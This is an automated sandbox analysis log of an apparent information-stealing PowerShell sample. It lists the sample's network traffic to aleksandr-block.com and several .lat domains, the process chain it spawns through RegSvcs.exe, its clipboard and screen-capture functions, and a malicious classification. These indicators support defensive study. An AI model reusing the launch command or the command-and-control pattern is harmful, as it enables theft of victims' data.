          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GBSKYUYXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18105Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BCJZRK6OZCUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8744Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QBZVGCEV2BXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20397Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZZDEVCIVA5CI7BQ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1387Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LNGIR13QGV4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 159730Host: aleksandr-block.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: aleksandr-block.com
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: curtainykeo.lat
          Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
          Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
          Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
          Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
          Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
          Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
          Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
          Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: aleksandr-block.com
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC01E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000000.00000002.1876839160.0000026ABE781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
          Source: powershell.exe, 00000000.00000002.1876839160.0000026ABFE2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC01E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC020F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
          Source: powershell.exe, 00000000.00000002.1876839160.0000026ABE781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/
          Source: RegSvcs.exe, 00000004.00000002.1875258963.00000000036C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/$
          Source: RegSvcs.exe, 00000004.00000002.1874715136.0000000001275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/-
          Source: RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/F9
          Source: RegSvcs.exe, 00000004.00000002.1874616021.000000000121E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.1874745531.00000000012AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/api
          Source: RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/bm
          Source: RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/bu
          Source: RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/fe
          Source: RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pi
          Source: RegSvcs.exe, 00000004.00000002.1874544857.0000000001202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/api
          Source: RegSvcs.exe, 00000004.00000002.1874544857.0000000001202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/api.
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.1876839160.0000026AC01E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.1876839160.0000026ABF967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000000.00000002.1876839160.0000026ABFE2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
          Source: powershell.exe, 00000000.00000002.1876839160.0000026ABFE2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004363E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004363E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,4_2_00436590
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8A62320_2_00007FFD9B8A6232
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8AA7690_2_00007FFD9B8AA769
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8AA7A00_2_00007FFD9B8AA7A0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B970FA40_2_00007FFD9B970FA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004159754_2_00415975
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00427A504_2_00427A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00440A0D4_2_00440A0D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004204404_2_00420440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004104464_2_00410446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004424604_2_00442460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00442DE04_2_00442DE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423E444_2_00423E44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040AE604_2_0040AE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042DEE54_2_0042DEE5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D6904_2_0040D690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004087404_2_00408740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043B7B04_2_0043B7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004300504_2_00430050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004110784_2_00411078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042A8104_2_0042A810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004338104_2_00433810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004270D04_2_004270D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004058E04_2_004058E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042D8934_2_0042D893
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004148B04_2_004148B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004288BA4_2_004288BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004361404_2_00436140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A9104_2_0040A910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004419104_2_00441910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004039204_2_00403920
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043912C4_2_0043912C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004091C04_2_004091C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004161DF4_2_004161DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004311E64_2_004311E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004321884_2_00432188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004061904_2_00406190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042F1954_2_0042F195
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004421B04_2_004421B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041E2504_2_0041E250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441A564_2_00441A56
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B2004_2_0041B200
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004042D04_2_004042D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041BAD04_2_0041BAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00433AD04_2_00433AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00431A884_2_00431A88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441A944_2_00441A94
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041AA904_2_0041AA90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00442A904_2_00442A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004082A04_2_004082A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041CAA04_2_0041CAA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043CAA74_2_0043CAA7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004412B14_2_004412B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441B404_2_00441B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C3704_2_0041C370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00420B104_2_00420B10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402B204_2_00402B20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00411B204_2_00411B20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042ABC04_2_0042ABC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441BD04_2_00441BD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004273A04_2_004273A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043AC404_2_0043AC40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004174514_2_00417451
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441C604_2_00441C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004194704_2_00419470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004074004_2_00407400
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00404C004_2_00404C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043C4104_2_0043C410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042ECD04_2_0042ECD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00439CD84_2_00439CD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00440CD84_2_00440CD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00414C9C4_2_00414C9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042CCA04_2_0042CCA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E4B04_2_0040E4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00426D704_2_00426D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00428D764_2_00428D76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00422D174_2_00422D17
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004245C04_2_004245C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004165EE4_2_004165EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004155904_2_00415590
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004095A04_2_004095A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00415E424_2_00415E42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00413E504_2_00413E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041BE004_2_0041BE00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004066204_2_00406620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402EF04_2_00402EF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043EE804_2_0043EE80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043AEA04_2_0043AEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043974A4_2_0043974A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004197104_2_00419710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041F7104_2_0041F710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C7D04_2_0041C7D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004427E04_2_004427E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00427F8D4_2_00427F8D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00413E40 appears 128 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00407F90 appears 52 times
          Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@10/10@11/2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043B7B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_0043B7B0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4nfyb1q.lkn.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7408" "2496" "2432" "2500" "0" "0" "2468" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7408" "2496" "2432" "2500" "0" "0" "2468" "0" "0" "0" "0" "0" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
